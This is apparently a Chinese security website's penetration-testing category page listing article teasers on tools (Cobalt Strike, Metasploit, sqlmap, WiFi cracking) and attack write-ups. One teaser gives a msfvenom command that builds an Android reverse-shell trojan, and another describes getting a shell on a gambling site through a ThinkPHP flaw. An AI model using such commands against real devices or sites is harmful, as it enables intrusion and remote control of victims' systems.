安基网 首页 安全渗透测试
订阅

渗透测试

  • 自动化渗透工具箱-Ary

    自动化渗透工具箱-Ary
    这里最近参与CIS大会,看到一款自动化渗透工具 Ary,特点是汇聚了各种可以调用的工具。介绍工具地址 https://github.com/TeraSecTeam/aryPOC收集 https://github.com/TeraSecTeam/poc-collectionAry是一个集各种渗透 ...
    2021-3-12 15:02
  • 简单的BC站点getshell

    简单的BC站点getshell
    最近来了点任务,做BC站,以前没做过只能碰碰运气! 确定目标 主站: 简单的BC站点getshell 通过旁站: 简单的BC站点getshell 信息收集 通过信息收集发现是个tp v5.0.9,此版本存在tp-rce漏洞。
    2021-3-11 11:14
  • 全能无线渗透测试工具,一个LAZY就搞定了

    全能无线渗透测试工具,一个LAZY就搞定了
    近来一直在研究无线安全方面的东西,特别是在无线渗透测试这块,每次渗透测试时总要来回不停的切换操作和挑选利器,很是麻烦。就想看看是否可以有一款功能全面的集合型工具。正所谓功夫不负有心人,还真有这么一个工 ...
    2021-1-22 12:52
  • 使用sqlmap曲折渗透某服务器

    使用sqlmap曲折渗透某服务器
    在实际渗透测试过程中,当发现目标站点存在SQL注入漏洞,一般都是交给sqlmap等工具来自动处理,证明其存在SQL注入漏洞以及获取数据库;如果当前网站使用的数据库用户为root账号,则还可以尝试获取Webshell和提权。在 ...
    2021-1-8 09:47
  • 相恨见晚:玩转内网的渗透神器CobaltStrike4

    相恨见晚:玩转内网的渗透神器CobaltStrike4
    作者:ATL安全团队 来自FreeBuf一、介绍内网渗透的神器工具CobaltStrikeCobalt Strike 一款以Metasploit为基础的GUI框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell木 ...
    2020-12-29 14:48
  • 某团购CMS的SQL注入漏洞代码审计

    某团购CMS的SQL注入漏洞代码审计
    本次审计的CMS是基于Web应用的B/S架构的团购网站建设解决方案的建站系统,它可以让用户高效、快速、低成本的构建个性化、专业化、强大功能的团购网站,采用PHP和MYSQL数据库开发技术,版本CV1.6
    2020-11-6 09:40
  • 白帽黑客教你Kali Linux:数据库密码脆弱性攻防演练下

    白帽黑客教你Kali Linux:数据库密码脆弱性攻防演练下
    1.安装好 Kali Linux 的虚拟机一台 2.搭建好Sql server的靶机一个; 3.整装待发的小白一个。
    2020-10-22 14:32
  • 白帽黑客与网络安全工程师教你:使用Metasploit进行FTP服务扫描

    白帽黑客与网络安全工程师教你:使用Metasploit进行FTP服务扫描
    在受害者Win2008 Server虚拟机配置防火墙(关闭防火墙),如下图所示。 命令:Win+R/cmd/firewall.cpl 3.2 在攻击方主机(Kali Linux主机)代开Postgresql数据库,如下图所示。 命令:service postgresql start
    2020-10-1 09:45
  • 黑客破解wifi密码-超详细过程

    黑客破解wifi密码-超详细过程
    前期准备VMware Workstation虚拟机在虚拟机安装好kail linunx系统无线网卡(芯片为3070或者1887L都支持Linux)一.打开终端,用airmon-ng命令查看如果出现无法访问…没有那个文件或目录解决办 ...
    2020-9-29 09:45
  • 一次授权的渗透测试

    一次授权的渗透测试
    一次正规且授权的测试,未使用任何扫描器,全程手工。这个客户呢是做的一个培训资料的商城。大概样子就是这样,其实当时拿到以后客户说不允许用任何扫描器,还有一点点懵。Thinkphp5.1.37 LTS 加 JQuery 1.7.2开始首先一个账户是必须要有的,难处在于因为验证码还在对接中,没法注册。只能要一个内 ...
    2020-9-7 10:06
  • 分享10个渗透测试最佳工具的使用方法及下载链接

    分享10个渗透测试最佳工具的使用方法及下载链接
    渗透测试的目的不仅是找到安全系统的易受攻击元素,还要检查企业中安全策略的合规性,衡量任何安全问题的意识和范围,并查看可能性在真正的外部实体网络攻击事件中,网络可能会遇到什么灾难。实质上,渗透测试允许你发现可能没有考虑过的弱点区域。渗透测试者提供了一种全新的视角,帮助企业改进系统安 ...
    2020-9-1 08:49
  • 来路不明的安装包请勿安装

    来路不明的安装包请勿安装
    前言本次渗透为靶机测试。切勿用于非法用途!攻击者:192.168.1.3 termux+metasploit受害者:192.168.1.2 Android 5.1 - Linux 3.10.72+ (aarch64)使用模块:multi/handler首先生成安卓木马msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=3800 -o s.apk将其移动到/storage/emulate ...
    2020-9-1 08:43
  • 内网渗透:不出网渗透技巧

    内网渗透:不出网渗透技巧
    搜索公众号:暗网黑客可领全套网络安全渗透教程、配套攻防靶场作者:诺言转载自:https://www.freebuf.com/articles/web/247287.html前言最近打了几场**,遇到几个内网环境都不通外网,整理下用到的几种不出网内网渗透技巧。socks隧道搭建常用工具:reGeorg,Proxifier用的比较多的一个隧道代理工具1、 ...
    2020-8-30 07:16
  • 渗透测试工具库

    渗透测试工具库
    搜索公众号:暗网黑客可领全套网络安全渗透教程、配套攻防靶场本地工具dirmap 子目录扫描https://gitee.com/c0ny10/dirmapsubDomainBrute 子域名扫描https://gitee.com/c0ny10/subDomainsBruteCknife WebShell管理工具https://gitee.com/c0ny10/cknifeJSFinder 快速在网站的js文件中提取URL,子域名htt ...
    2020-8-30 07:14
  • 白帽子黑客教你:如何使用Dirbuster网站目录扫描神器?

    白帽子黑客教你:如何使用Dirbuster网站目录扫描神器?
    声明:本头条号分享仅做学习交流,请自觉遵守网络安全法等法律法规!据说点击了解更多,还有更多干货!但这干货有没有用,等你看了再说!一、背景介绍DirBuster是用来探测web服务器上的目录和隐藏文件的。因为DirBuster是采用java编写的,所以运行前要安装上java的环境。 来看一下基本的使用: ①:Tar ...
    2020-8-30 07:13
  • 最新
    返回顶部